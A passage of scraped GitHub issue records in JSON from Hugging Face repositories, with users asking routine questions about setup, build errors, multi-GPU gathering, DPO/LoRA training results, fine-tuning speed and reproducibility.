video, but any similar example would be useful.\r\n\r\nIf not, does this approach seem correct?\r\n* Use one of the approaches described [here](https://stackoverflow.com/questions/32699721/javascript-extract-video-frames-reliably) to draw each frame of the video to a canvas\r\n* Call `HTMLCanvasElement.toBlob()` on the canvas to get a `Blob`\r\n* Pass N (10?) of those Blobs to a worker at a time\r\n* For each of those Blobs call `const image = await RawImage.fromBlob(blob)` to get a `RawImage`\r\n* Run depth estimation on the list of images with `await classifier([rawImage1, rawImage2, etc.])`\r\n\r\nThanks for any help!\r\n", "url": "https://github.com/huggingface/transformers.js/issues/417", "state": "open", "labels": [ "question" ], "created_at": "2023-11-26T09:18:04Z", "updated_at": "2023-12-10T22:51:18Z", "user": "jparismorgan" }, { "repo": "huggingface/chat-ui", "number": 583, "title": "Option to share the web interface locally/online ?", "body": "I wish we could make the ui available on phone/mac or even outside the local network.\r\nFor example in SillyTavern (https://github.com/SillyTavern/SillyTavern)\r\nYou can either open it up to all devices in the local network or open a cloudflare tunnel to access it through a link.\r\nIs that possible to add? ", "url": "https://github.com/huggingface/chat-ui/issues/583", "state": "open", "labels": [ "enhancement", "back" ], "created_at": "2023-11-26T00:44:08Z", "updated_at": "2024-04-22T16:45:44Z", "comments": 2, "user": "iChristGit" }, { "repo": "huggingface/candle", "number": 1375, "title": "Question: How to interface a C++ API `torch::Tensor` with `candle_core::Tensor`?", "body": "I was wondering if there is a way to use a C++ API that accepts a Pytorch `torch::Tensor` with a Candle `candle_core::Tensor`? For reference, I want to use [this](https://github.com/vllm-project/vllm/blob/main/csrc/ops.h) C++ API.\r\n\r\nCan I convert between tensor types? @LaurentMazare, would it be possible to use [tch-rs](https://github.com/LaurentMazare/tch-rs) to make this conversion?\r\n\r\nThanks for any help!", "url": "https://github.com/huggingface/candle/issues/1375", "state": "closed", "labels": [], "created_at": "2023-11-25T19:05:27Z", "updated_at": "2023-11-25T23:04:03Z", "user": "EricLBuehler" }, { "repo": "huggingface/accelerate", "number": 2187, "title": "how to collect outputs(not tensor dtype) on multi gpus ", "body": "As the toy example below, \r\n\r\n```\r\nval_dataset = ['a', 'b', 'c', 'd', 'e']\r\nval_dataloader = DataLoader(\r\n val_dataset, batch_size=2\r\n )\r\naccelerator = Accelerator()\r\nval_dataloader = accelerator.prepare(val_dataloader)\r\nfor step, batch in enumerate(val_dataloader):\r\n print(batch, accelerator.device)\r\n```\r\n\r\nWhen i run this script by `CUDA_VISIBLE_DEVICES=\"0,1\" accelerate launch --config_file=\"./configs/acc_mgpu_config.yaml\" test_batch.py` , i will get below results, how can I get ['a', 'b', 'c', 'd', 'e'] in main process after reduce batch in all processes? \r\n```\r\n['a', 'b'] cuda:0\r\n['e', 'a'] cuda:0\r\n['c', 'd'] cuda:1\r\n['b', 'c'] cuda:1\r\n```\r\n\r\nI know that accelerate have a `gather_for_metrics` can gathers input and potentially **drops duplicates** in the last batch if on a distributed system. But this function seems only works for data which is tensor type, in this example, my data is string, is there any way to achieve this?\r\n(if i use `print(accelerator.gather_for_metrics((batch)), accelerator.device)`, it will raise error like below\r\n```\r\nTypeError: Unsupported types () passed to `_gpu_gather_one`. Only nested list/t\r\nuple/dicts of objects that are valid for `is_torch_tensor` should be passed.\r\n```\r\nThanks for any potential answers!", "url": "https://github.com/huggingface/accelerate/issues/2187", "state": "closed", "labels": [], "created_at": "2023-11-25T02:51:21Z", "updated_at": "2023-11-27T06:07:19Z", "user": "shliu0" }, { "repo": "huggingface/chat-ui", "number": 581, "title": "Trying to set up with TGI", "body": "I have installed TGI using docker, I can see the api docs at http://127.0.0.1:8080/docs/\r\nBut still cannot set up the env.local file, I have tried to set it up with the example, but always failing.\r\n![image](https://github.com/huggingface/chat-ui/assets/20077386/032a02c0-9d3b-473e-9c1b-a3c948eb06d3)\r\n![image](https://github.com/huggingface/chat-ui/assets/20077386/3cd0a46d-0334-448e-bad8-2124045abc42)Can someone who set it up correctly give me the rough idea of how to write the file ? I have tried a lot of combinations, and it always fail either internal error or the screenshot above.\r\n", "url": "https://github.com/huggingface/chat-ui/issues/581", "state": "open", "labels": [ "support" ], "created_at": "2023-11-24T19:20:27Z", "updated_at": "2023-12-19T06:02:25Z", "comments": 2, "user": "iChristGit" }, { "repo": "huggingface/transformers.js", "number": 412, "title": "[Question] Does any version support Node 14", "body": "Hi,\r\n\r\nI have tried downgrading the library to version 2, and even to 1, but that one was missing types.\r\n\r\nIs there some way to be able to use it with Node 14? I have seen that mostly the issues are with nullish coalescing characters, so wanted to make sure if there could be other issues that tie it to Node 18+, and also if there have been any security and vulnerability issues from said version (that could work with Node 14).\r\n\r\nThanks\r\n", "url": "https://github.com/huggingface/transformers.js/issues/412", "state": "closed", "labels": [ "question" ], "created_at": "2023-11-24T16:01:54Z", "updated_at": "2023-12-04T13:16:26Z", "user": "Ncifra" }, { "repo": "huggingface/hf_transfer", "number": 20, "title": "[Usage] How to enable the progress bar?", "body": "I've installed `hf_transfer-0.1.4`.\r\nBut when I use `huggingface-cli download`, the progress bar mentioned [here](https://huggingface.co/docs/huggingface_hub/guides/download#faster-downloads) seems to be disabled at default.\r\nAnd I failed to figure out how to enable it.\r\nCould anyone be kind enough to provide some guidance?", "url": "https://github.com/huggingface/hf_transfer/issues/20", "state": "closed", "labels": [], "created_at": "2023-11-24T08:13:00Z", "updated_at": "2023-11-27T12:15:10Z", "user": "tongyx361" }, { "repo": "huggingface/gsplat.js", "number": 39, "title": "How to implement point clouds render?", "body": "Hi, great work! I see that this library is upon [antimatter15/splat](https://github.com/antimatter15/splat), but this library does not have the same render which is very similar to point clouds like that lib. I want to know how to implement this function base on your gsplat library? By the way, do you have any document about the config options, so I can set some render options?", "url": "https://github.com/huggingface/gsplat.js/issues/39", "state": "open", "labels": [], "created_at": "2023-11-24T07:27:33Z", "updated_at": "2024-01-22T21:12:06Z", "user": "xinnai" }, { "repo": "huggingface/alignment-handbook", "number": 46, "title": "Weird DPO loss", "body": "Hi, I would like to raise some attention to issue #38.\r\n\r\nIt seems that the DPO-Lora training loss (red line) drops abruptly at the beginning of each epoch, which seems weird. (I tried Lora model global batch size 64, multi_gpu acceleration, 8GPUs, learning rate 1e-4, others same suggested) \r\n\r\nIn the mean time, the full parameter fine tunning has no such problem (official settings). \r\n\r\n![image](https://github.com/huggingface/alignment-handbook/assets/40993476/5ffa7fd5-c93b-44e5-a150-2a133371ab13)\r\n\r\nI don't know if this is normal and **assume this is a bug associated with the lora model**. Is there any explanations? Has anyone encountered the same issue? If your rerun loss is normal, can you share your configs?", "url": "https://github.com/huggingface/alignment-handbook/issues/46", "state": "open", "labels": [], "created_at": "2023-11-24T03:07:46Z", "updated_at": "2024-05-28T07:09:10Z", "comments": 1, "user": "ChenDRAG" }, { "repo": "huggingface/diffusers", "number": 5912, "title": "How to set config in VaeImageProcessor?", "body": "I created a `StableDiffusionControlNetImg2ImgPipeline` and I want to manually set the config `do_normalize` in `VaeImageProcessor`. I wonder how can I set? I look for it in the pipe.vae.config and see nothing about it.", "url": "https://github.com/huggingface/diffusers/issues/5912", "state": "closed", "labels": [ "stale" ], "created_at": "2023-11-23T12:54:22Z", "updated_at": "2023-12-26T21:29:17Z", "user": "youyuge34" }, { "repo": "huggingface/chat-ui", "number": 576, "title": "Cannot build using latest Chat UI Space template", "body": "Using the Dockerfile created from the ChatUI-Space template, but cloning it to a local machine and trying to build it fails at `npm run build`\r\n\r\n> #18 [chatui-builder 12/12] RUN npm run build\r\n#0 0.673\r\n#0 0.673 > chat-ui@0.6.0 build\r\n#0 0.673 > vite build\r\n#0 0.673\r\n#0 1.678 vite v4.3.9 building SSR bundle for production...\r\n#0 1.678\r\n#0 1.707 transforming...\r\n#0 4.381 \"BaseClient\" and \"TokenSet\" are imported from external module \"openid-client\" but never used in \"src/lib/server/auth.ts\".\r\n#0 4.381 \u2713 210 modules transformed.\r\n#0 4.473 rendering chunks...\r\n#0 5.665\r\n#0 5.665 node:internal/event_target:1036\r\n#0 5.665 process.nextTick(() => { throw err; });\r\n#0 5.665 ^\r\n#0 5.666 SyntaxError [Error]: Bad control character in string literal in JSON at position 157\r\n#0 5.666 at JSON.parse ()\r\n#0 5.666 at file:///app/chat-ui/.svelte-kit/output/server/chunks/models.js:512:51\r\n#0 5.666 at ModuleJob.run (node:internal/modules/esm/module_job:193:25)\r\n#0 5.666 Emitted 'error' event on Worker instance at:\r\n#0 5.666 at [kOnErrorMessage] (node:internal/worker:309:10)\r\n#0 5.666 at [kOnMessage] (node:internal/worker:320:37)\r\n#0 5.666 at MessagePort. (node:internal/worker:216:57)\r\n#0 5.666 at [nodejs.internal.kHybridDispatch] (node:internal/event_target:761:20)\r\n#0 5.666 at exports.emitMessage (node:internal/per_context/messageport:23:28)\r\n#0 5.666\r\n#0 5.666 Node.js v19.9.0\r\n#0 5.751 npm notice\r\n#0 5.751 npm notice New major version of npm available! 9.6.3 -> 10.2.4\r\n#0 5.751 npm notice Changelog: \r\n#0 5.751 npm notice Run `npm install -g npm@10.2.4` to update!\r\n#0 5.751 npm notice\r\n#18 ERROR: process \"/bin/sh -c npm run build\" did not complete successfully: exit code: 1\r\n#------\r\n#> [chatui-builder 12/12] RUN npm run build:\r\n#0 5.666 at MessagePort. (node:internal/worker:216:57)\r\n#0 5.666 at [nodejs.internal.kHybridDispatch] (node:internal/event_target:761:20)\r\n#0 5.666 at exports.emitMessage (node:internal/per_context/messageport:23:28)\r\n#0 5.666\r\n#0 5.666 Node.js v19.9.0\r\n#0 5.751 npm notice\r\n#0 5.751 npm notice New major version of npm available! 9.6.3 -> 10.2.4\r\n#0 5.751 npm notice Changelog: \r\n#0 5.751 npm notice Run `npm install -g npm@10.2.4` to update!\r\n#0 5.751 npm notice\r\n#------\r\n#Dockerfile:49\r\n#--------------------\r\n#47 | npm ci\r\n#48 |\r\n#49 | >>> RUN npm run build\r\n#50 |\r\n#51 | FROM ghcr.io/huggingface/text-generation-inference:latest\r\n#--------------------\r\n#ERROR: failed to solve: process \"/bin/sh -c npm run build\" did not complete successfully: exit code: 1", "url": "https://github.com/huggingface/chat-ui/issues/576", "state": "open", "labels": [ "support", "spaces" ], "created_at": "2023-11-23T12:23:06Z", "updated_at": "2023-11-30T14:11:32Z", "comments": 1, "user": "simon376" }, { "repo": "huggingface/transformers", "number": 27666, "title": "how to remove punctuation marks.", "body": "### System Info\n\ni trained t5-large for translation.\r\n\r\nthe result of train was good\r\n\r\nBut when i input some sentence, the result is like that \"What are you doing now?.??.....\"\r\n\r\n[?.??......] <- how to delete that punctuation marks.\r\n\r\ni put some parameter like max_length. But i can not solve that situation\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nc\n\n### Expected behavior\n\ncfdvf", "url": "https://github.com/huggingface/transformers/issues/27666", "state": "closed", "labels": [], "created_at": "2023-11-23T07:21:33Z", "updated_at": "2023-12-31T08:03:43Z", "user": "chanyong-owl" }, { "repo": "huggingface/blog", "number": 1655, "title": "how to scale fine-tuning whisper in English?", "body": "I'm attempting to fine-tune whisper using the excellent hugging face tut: https://huggingface.co/blog/fine-tune-whisper. The delta between the tut's case and my case is that I am using English which has 1M more test cases (and also I'm using big GPUs so I am using `whisper-large-v3`).\r\n\r\nNo matter how much compute I throw at the core data preparation step (e.g. take a look at `num_proc`):\r\n\r\n`common_voice = common_voice.map(prepare_dataset, remove_columns=common_voice.column_names[\"train\"], num_proc=108)`\r\n\r\nI still only prepare the data at about 30 examples / s. For 1M examples this doesn't scale. My last test was on an 8 GPU 112 vCPU instance and still there was no change. Indeed `htop` shows that all 112 of my vCPUs are engaged, but the actual prep speed remains flat across all compute types. The only thing I haven't tried is crazy fast storage like NVMe, which I'm going to do, but I have a feeling it has to do with either the `datasets` library configuration or something else. I've never had problems with GPUs or whisper previously so I'm a bit baffled as to what the issue could. I've followed the tutorial to a 't' except for changing the language to `en`, whisper to `whisper-large-v3` and `num_proc` to higher parallels. Any insight would be greatly appreciated!", "url": "https://github.com/huggingface/blog/issues/1655", "state": "open", "labels": [], "created_at": "2023-11-22T22:45:29Z", "updated_at": "2024-03-10T06:55:47Z", "user": "jsteinberg-rbi" }, { "repo": "huggingface/datasets", "number": 6446, "title": "Speech Commands v2 dataset doesn't match AST-v2 config", "body": "### Describe the bug\n\n[According](https://huggingface.co/MIT/ast-finetuned-speech-commands-v2) to `MIT/ast-finetuned-speech-commands-v2`, the model was trained on the Speech Commands v2 dataset. However, while the model config says the model should have 35 class labels, the dataset itself has 36 class labels. Moreover, the class labels themselves don't match between the model config and the dataset. It is difficult to reproduce the data used to fine tune `MIT/ast-finetuned-speech-commands-v2`.\n\n### Steps to reproduce the bug\n\n```\r\n>>> model = ASTForAudioClassification.from_pretrained(\"MIT/ast-finetuned-speech-commands-v2\")\r\n>>> model.config.id2label\r\n{0: 'backward', 1: 'follow', 2: 'five', 3: 'bed', 4: 'zero', 5: 'on', 6: 'learn', 7: 'two', 8: 'house', 9: 'tree', 10: 'dog', 11: 'stop', 12: 'seven', 13: 'eight', 14: 'down', 15: 'six', 16: 'forward', 17: 'cat', 18: 'right', 19: 'visual', 20: 'four', 21: 'wow', 22: 'no', 23: 'nine', 24: 'off', 25: 'three', 26: 'left', 27: 'marvin', 28: 'yes', 29: 'up', 30: 'sheila', 31: 'happy', 32: 'bird', 33: 'go', 34: 'one'}\r\n\r\n>>> dataset = load_dataset(\"speech_commands\", \"v0.02\", split=\"test\")\r\n>>> torch.unique(torch.Tensor(dataset['label']))\r\ntensor([ 0., 1., 2., 3., 4., 5., 6., 7., 8., 9., 10., 11., 12., 13.,\r\n 14., 15., 16., 17., 18., 19., 20., 21., 22., 23., 24., 25., 26., 27.,\r\n 28., 29., 30., 31., 32., 33., 34., 35.])\r\n```\r\nIf you try to explore the [dataset itself](https://huggingface.co/datasets/speech_commands/viewer/v0.02/test), you can see that the id to label does not match what is provided by `model.config.id2label`.\r\n\n\n### Expected behavior\n\nThe labels should match completely and there should be the same number of label classes between the model config and the dataset itself.\n\n### Environment info\n\ndatasets = 2.14.6, transformers = 4.33.3", "url": "https://github.com/huggingface/datasets/issues/6446", "state": "closed", "labels": [], "created_at": "2023-11-22T20:46:36Z", "updated_at": "2023-11-28T14:46:08Z", "comments": 3, "user": "vymao" }, { "repo": "huggingface/alignment-handbook", "number": 45, "title": "Reproducing of Lora Model Result on MT-Bench", "body": "Recently, I attempted to fit the DPO on my own dataset.\r\nInitially, I tried to reproduce the results of your LORA model( 7.43 on MT-Bench).\r\nHowever, I encountered some issues. \r\nDespite using all your parameters and data, here are my results on MT-Bench:\r\n| Model | MT-Bench |\r\n|--------|--------|\r\n| Zephyr-SFT-Lora-Own | 6.37 |\r\n| Zephyr-DPO-Lora-Own | 6.95 | \r\n\r\nThen, I downloaded your models from [here](https://huggingface.co/alignment-handbook), and the results were nearly the same as mine.\r\n| Model | MT-Bench |\r\n|--------|--------|\r\n| Zephyr-SFT-Lora| 6.4|\r\n| Zephyr-DPO-Lora| 6.93 | \r\n\r\nDPO does help improve performance on MT-Bench, but I can't achieve a score of **7.43**. Is there any difference between the model described in your paper and the model available on your homepage? \r\nOr could it be the difference between the full and LORA?\r\n\r\nBy the way, I truly love the \"yaml style\" argument parser; it's clear and elegant!\r\n@edbeeching @lewtun \r\n\r\n", "url": "https://github.com/huggingface/alignment-handbook/issues/45", "state": "open", "labels": [], "created_at": "2023-11-22T03:42:32Z", "updated_at": "2023-12-11T17:09:32Z", "comments": 27, "user": "wlhgtc" }, { "repo": "huggingface/optimum", "number": 1551, "title": "Running llama-2-13b resulted in `Killed`", "body": "### System Info\n\n```shell\nThis is my run.py code:\r\n\r\n import torch\r\n import transformers\r\n import requests\r\n print(torch.cuda.is_available())\r\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n # Load model and adapter weights from local directory\r\n model = transformers.AutoModelForCausalLM.from_pretrained(\"/home/maxloo/src/pastoring/llama/llama-2-13b\")\r\n model.to(device)\r\n adapter = transformers.AutoModelForCausalLM.from_pretrained(\"/home/maxloo/src/pastoring/adapter\", config=transformers.configuration.AdapterConfig.from_json_file(\"adapter_config.json\"))\r\n model.load_state_dict(adapter.state_dict())\r\n adapter.load_state_dict(model.state_dict())\r\n # Define prompt\r\n prompt = \"Hello, I am a chatbot.\"\r\n # Perform inference\r\n response = model.generate(prompt, max_length=50)\r\n # Print response\r\n print(response)\r\n\r\nThis is my adapter_config.json code:\r\n\r\n {\r\n \"base_model_name_or_path\": \"../llama/llama-2-13b/\",\r\n \"bias\": \"none\",\r\n \"enable_lora\": null,\r\n \"fan_in_fan_out\": false,\r\n \"inference_mode\": true,\r\n \"init_lora_weights\": true,\r\n \"lora_alpha\": 16,\r\n \"lora_dropout\": 0.05,\r\n \"merge_weights\": false,\r\n \"modules_to_save\": null,\r\n \"peft_type\": \"LORA\",\r\n \"r\": 16,\r\n \"target_modules\": [\r\n \"q_proj\",\r\n \"k_proj\",\r\n \"v_proj\",\r\n \"o_proj\"\r\n ],\r\n \"task_type\": \"CAUSAL_LM\",\r\n \"task\": \"question_answering\",\r\n \"domain\": \"general\"\r\n }\r\n\r\nThese are my hardware specs:\r\n\r\n Intel Core i7-13700HX, NVIDIA RTX 4060, 32GB DDR5, 1TB SSD\r\n\r\nI'm using Windows 11 WSL2 Bash to run this command:\r\n\r\n python3 run.py\r\n\r\nI have set my .wslconfig file as follows:\r\n\r\n [wsl2]\r\n memory=24GB\r\n processors=24\r\n\r\nI expect a chat message to be displayed and a prompt for my chat input, but this is the actual output:\r\n\r\n Killed\r\n\r\nHow do I resolve this? Should I be testing llama-13b first before llama-2-13b?\n```\n\n\n### Who can help?\n\n@echarlaix, \r\n@philschmid\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\npython3 run.py\r\n![Screenshot 2023-11-21 211036](https://github.com/huggingface/optimum/assets/71763812/fc5b7e1c-1e57-41e5-a986-130681eba41d)\r\n\n\n### Expected behavior\n\nI expect a chat message to be displayed and a prompt for my chat input, but this is the actual output:\r\n\r\n Killed\r\n\r\nHow do I resolve this? Should I be testing llama-13b first before llama-2-13b? ", "url": "https://github.com/huggingface/optimum/issues/1551", "state": "closed", "labels": [ "bug" ], "created_at": "2023-11-21T13:11:40Z", "updated_at": "2024-01-09T15:58:09Z", "comments": 1, "user": "maxloopinmok" }, { "repo": "huggingface/optimum-quanto", "number": 32, "title": "Are threre some exmples show how to export onnx model ? torch.onnx.export", "body": "", "url": "https://github.com/huggingface/optimum-quanto/issues/32", "state": "closed", "labels": [], "created_at": "2023-11-21T11:33:37Z", "updated_at": "2024-03-13T08:15:51Z", "user": "youkiwang" }, { "repo": "huggingface/transformers", "number": 27615, "title": "How to get the number of trainable parameters for a hf model", "body": "### Feature request\r\n'\r\npeft_parameters = LoraConfig(\r\n lora_alpha=16,\r\n lora_dropout=0.1,\r\n r=8,\r\n bias=\"none\",\r\n task_type=\"CAUSAL_LM\"\r\n)\r\ntrain_params = TrainingArguments(\r\n output_dir=\"./results_modified\",\r\n num_train_epochs=1,\r\n per_device_train_batch_size=4,\r\n gradient_accumulation_steps=1,\r\n optim=\"paged_adamw_32bit\",\r\n save_steps=25,\r\n logging_steps=25,\r\n learning_rate=2e-4,\r\n weight_decay=0.001,\r\n fp16=False,\r\n bf16=False,\r\n max_grad_norm=0.3,\r\n max_steps=-1,\r\n warmup_ratio=0.03,\r\n group_by_length=True,\r\n lr_scheduler_type=\"constant\",\r\n report_to=\"tensorboard\"\r\n)\r\nfine_tuning = SFTTrainer(\r\n model=base_model,\r\n train_dataset=training_data,\r\n peft_config=peft_parameters,\r\n dataset_text_field=\"text\",\r\n tokenizer=llama_tokenizer,\r\n args=train_params\r\n)\r\n\r\nfine_tuning.train()\r\n\r\nI am using the above code for model training with Lora. I wonder after applying to Lora. How could I check the number of trainable parameters of the model before and after?\r\n\r\n### Motivation\r\n\r\nUnderstand the training process well\r\n\r\n### Your contribution\r\n\r\nI'd love to ", "url": "https://github.com/huggingface/transformers/issues/27615", "state": "closed", "labels": [], "created_at": "2023-11-21T00:37:01Z", "updated_at": "2023-11-21T19:28:32Z", "user": "mathmax12" }, { "repo": "huggingface/chat-ui", "number": 571, "title": "trying to replicate the api search with the local search option", "body": "When I try searching for information on the site (huggingface.co/chat) it works fine and gives correct information, but when doing the same thing using the same model I get hallucinations..\r\nIve tried all sorts of temperature settings and models.\r\nThis is the result locally:\r\n![image](https://github.com/huggingface/chat-ui/assets/20077386/cee5a762-3004-4953-9a9b-c6dc2291c569)\r\nThis is with the site:\r\n![image](https://github.com/huggingface/chat-ui/assets/20077386/0f1001bf-6c16-4dc0-84b5-b668d135c1d6)\r\nThe sources look the smae on both but the actual response is always not even real information..\r\nThis is my current config:\r\n\r\nMONGODB_URL=mongodb://localhost:27017\r\nPUBLIC_APP_NAME=PrivateGPT\r\nMODELS=`[\r\n {\r\n \"name\": \"text-generation-webui\",\r\n \"id\": \"text-generation-webui\",\r\n \"parameters\": {\r\n \"temperature\": 0.1,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 12,\r\n \"truncate\": 1000,\r\n \"max_new_tokens\": 1024,\r\n \"stop\": []\r\n },\r\n \"endpoints\": [{\r\n \"type\" : \"openai\",\r\n \"baseURL\": \"http://127.0.0.1:5000/v1/\"\r\n }]\r\n }\r\n]`\r\n\r\n\r\nTypeError [ERR_INVALID_STATE]: Invalid state: Controller is already closed\r\n at new NodeError (node:internal/errors:405:5)\r\n at ReadableStreamDefaultController.enqueue (node:internal/webstreams/readablestream:1040:13)\r\n at update (C:/ChatUI/src/routes/conversation/[id]/+server.ts:155:20)\r\n at Object.start (C:/ChatUI/src/routes/conversation/[id]/+server.ts:189:15)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5) {\r\n code: 'ERR_INVALID_STATE'\r\n}\r\nTypeError [ERR_INVALID_STATE]: Invalid state: Controller is already closed\r\n at new NodeError (node:internal/errors:405:5)\r\n at ReadableStreamDefaultController.enqueue (node:internal/webstreams/readablestream:1040:13)\r\n at update (C:/ChatUI/src/routes/conversation/[id]/+server.ts:155:20)\r\n at Object.start (C:/ChatUI/src/routes/conversation/[id]/+server.ts:189:15)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5) {\r\n", "url": "https://github.com/huggingface/chat-ui/issues/571", "state": "closed", "labels": [ "support" ], "created_at": "2023-11-20T20:57:23Z", "updated_at": "2023-12-05T15:19:49Z", "comments": 29, "user": "iChristGit" }, { "repo": "huggingface/trl", "number": 1014, "title": "How to avoid training radomness?", "body": "I\u2019m using the `trl.SFTTrainer` to fine-tune Vicuna, and I\u2019m using the same data and parameters for fine-tuning. However, I\u2019ve noticed that even after setting:\r\n\r\n```\r\ndef set_seed(seed=42):\r\n # set seed for all possible avenues of stochasticity\r\n numpy.random.seed(seed=seed)\r\n random.seed(seed)\r\n torch.manual_seed(seed)\r\n torch.cuda.manual_seed(seed)\r\n torch.cuda.manual_seed_all(seed)\r\n torch.backends.cudnn.benchmark = False\r\n torch.backends.cudnn.deterministic = True\r\n\r\ntraining_args = TrainingArguments(\r\n report_to=\"none\",\r\n output_dir=str(ckpt_path),\r\n do_eval=False,\r\n save_strategy=\"epoch\",\r\n evaluation_strategy=\"no\",\r\n num_train_epochs=training_epochs,\r\n seed=42,\r\n )\r\n ```\r\n \r\nthe fine-tuned checkpoint\u2019s evaluation remains unstable. Every time I fine-tune with the same dataset, I get significantly different results. How can I ensure the stability of my fine-tuning?\r\n\r\nI also tried this:\r\n\r\nhttps://discuss.huggingface.co/t/fixing-the-random-seed-in-the-trainer-does-not-produce-the-same-results-across-runs/3442\r\n\r\nBut I was wrong even with this codes:\r\n\r\n```\r\n def model_init():\r\n return AutoModelForCausalLM.from_pretrained(\r\n \"/data/ckpts/huggingface/models/models--lmsys--vicuna-7b-v1.5/snapshots/de56c35b1763eaae20f4d60efd64af0a9091ebe5\",\r\n device_map=\"auto\",\r\n torch_dtype=torch.bfloat16,\r\n use_flash_attention_2=True,\r\n )\r\n\r\n training_args = TrainingArguments(\r\n report_to=\"none\",\r\n output_dir=str(ckpt_path),\r\n do_eval=False,\r\n save_strategy=\"epoch\",\r\n evaluation_strategy=\"no\",\r\n num_train_epochs=training_epochs,\r\n seed=42,\r\n )\r\n trainer = SFTTrainer(\r\n model_init=model_init,\r\n args=training_args,\r\n train_dataset=mapped_dataset,\r\n dataset_text_field=\"text\",\r\n data_collator=data_collator,\r\n max_seq_length=1500,\r\n )\r\n``` \r\n \r\nThis would end in errors.\r\n\r\n```\r\nTraceback (most recent call last):\r\n File \"/home/cyzhao/miniconda3/envs/prompt/lib/python3.11/site-packages/huggingface_hub/utils/_errors.py\", line 261, in hf_raise_for_status\r\n response.raise_for_status()\r\n File \"/home/cyzhao/miniconda3/envs/prompt/lib/python3.11/site-packages/requests/models.py\", line 1021, in raise_for_status\r\n raise HTTPError(http_error_msg, response=self)\r\nrequests.exceptions.HTTPError: 401 Client Error: Unauthorized for url: https://huggingface.co/None/resolve/main/config.json\r\n\r\nThe above exception was the direct cause of the following exception:\r\n\r\nTraceback (most recent call last):\r\n File \"/home/cyzhao/miniconda3/envs/prompt/lib/python3.11/site-packages/transformers/utils/hub.py\", line 429, in cached_file\r\n resolved_file = hf_hub_download(\r\n ^^^^^^^^^^^^^^^^\r\n File \"/home/cyzhao/miniconda3/envs/prompt/lib/python3.11/site-packages/huggingface_hub/utils/_validators.py\", line 118, in _inner_fn\r\n return fn(*args, **kwargs)\r\n ^^^^^^^^^^^^^^^^^^^\r\n File \"/home/cyzhao/miniconda3/envs/prompt/lib/python3.11/site-packages/huggingface_hub/file_download.py\", line 1346, in hf_hub_download\r\n raise head_call_error\r\n File \"/home/cyzhao/miniconda3/envs/prompt/lib/python3.11/site-packages/huggingface_hub/file_download.py\", line 1232, in hf_hub_download\r\n metadata = get_hf_file_metadata(\r\n ^^^^^^^^^^^^^^^^^^^^^\r\n File \"/home/cyzhao/miniconda3/envs/prompt/lib/python3.11/site-packages/huggingface_hub/utils/_validators.py\", line 118, in _inner_fn\r\n return fn(*args, **kwargs)\r\n ^^^^^^^^^^^^^^^^^^^\r\n File \"/home/cyzhao/miniconda3/envs/prompt/lib/python3.11/site-packages/huggingface_hub/file_download.py\", line 1608, in get_hf_file_metadata\r\n hf_raise_for_status(r)\r\n File \"/home/cyzhao/miniconda3/envs/prompt/lib/python3.11/site-packages/huggingface_hub/utils/_errors.py\", line 293, in hf_raise_for_status\r\n raise RepositoryNotFoundError(message, response) from e\r\nhuggingface_hub.utils._errors.RepositoryNotFoundError: 401 Client Error. (Request ID: Root=1-655b8b21-096243713e568c65194e1a69;8e4415fe-8069-43e1-8412-fdd028a8ebcd)\r\n\r\nRepository Not Found for url: https://huggingface.co/None/resolve/main/config.json.\r\nPlease make sure you specified the correct `repo_id` and `repo_type`.\r\nIf you are trying to access a private or gated repo, make sure you are authenticated.\r\nInvalid username or password.\r\n\r\nThe above exception was the direct cause of the following exception:\r\n\r\nTraceback (most recent call last):\r\n File \"/home/cyzhao/main/test_scripts/main.py\", line 402, in \r\n finetune_vicuna(\r\n File \"/home/cyzhao/main/test_scripts/main.py\", line 207, in finetune_vicuna\r\n trainer = SFTTrainer(\r\n ^^^^^^^^^^^\r\n File \"/home/cyzhao/miniconda3/envs/prompt/lib/python3.11/site-packages/trl/trainer/sft_trainer.py\", line 162, in __init__\r\n model = AutoModelForCausalLM.from_pretrained(model)\r\n ^^^^^^^", "url": "https://github.com/huggingface/trl/issues/1014", "state": "closed", "labels": [], "created_at": "2023-11-20T16:47:28Z", "updated_at": "2024-01-03T15:05:11Z", "user": "zhaochenyang20" }, { "repo": "huggingface/candle", "number": 1349, "title": "How to pass bounding box instead of points in the segment-anything example?", "body": "Is it possible to pass a bounding box instead of points when using the segment-anything model? Is this just 4 points?", "url": "https://github.com/huggingface/candle/issues/1349", "state": "open", "labels": [], "created_at": "2023-11-20T15:44:22Z", "updated_at": "2023-11-20T15:44:22Z", "user": "svelterust" }, { "repo": "huggingface/alignment-handbook", "number": 43, "title": "Did you use RMSprop or AdamW as the optimizer?", "body": "Hi to whoever is reading this \ud83e\udd17 \r\n\r\n## Question\r\n\r\nAfter reading the Zephyr pre-printed paper https://arxiv.org/pdf/2310.16944.pdf and going through the configuration files here, I saw that there was a mismatch between the optimizer used in https://github.com/huggingface/alignment-handbook/blob/main/recipes/zephyr-7b-beta/dpo/config_full.yaml, and the one reported in the paper, AdamW.\r\n\r\nSo the question is, did you use RMSprop to run the full DPO fine-tuning or AdamW with no weight decay as stated in the paper?\r\n\r\nThanks in advance!", "url": "https://github.com/huggingface/alignment-handbook/issues/43", "state": "closed", "labels": [], "created_at": "2023-11-20T15:23:03Z", "updated_at": "2024-03-07T06:55:07Z", "comments": 3, "user": "alvarobartt" }, { "repo": "huggingface/sentence-transformers", "number": 2359, "title": "How to evaluate the result of dataset that does not have any labels", "body": "Hi,\r\n\r\nI was trying to look at the different evaluation metrics that are provided to SentenceTransformers. I have a column of text in my dataset that I compare against a query and get the top k similarity using cosine similarity. I do not know if there is any method to evaluate the result. Should I consider the cosine similarity score as my evaluation metric as well? By evaluation, I mean, how can I show that the result I got is good? Is reasonable?\r\n\r\nfrom sentence_transformers import SentenceTransformer, util\r\nimport pandas as pd\r\n\r\n# Load a pre-trained model\r\nmodel = 